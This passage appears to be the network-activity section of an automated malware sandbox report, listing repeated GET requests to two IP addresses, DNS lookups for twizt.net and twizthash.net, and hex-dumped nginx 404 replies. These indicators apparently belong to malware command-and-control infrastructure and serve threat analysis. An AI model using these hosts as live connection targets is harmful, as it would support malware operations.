                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficDNS traffic detected: DNS query: twizt.net
                          Source: global trafficDNS traffic detected: DNS query: www.geoplugin.net
                          Source: global trafficDNS traffic detected: DNS query: twizthash.net
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:46 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 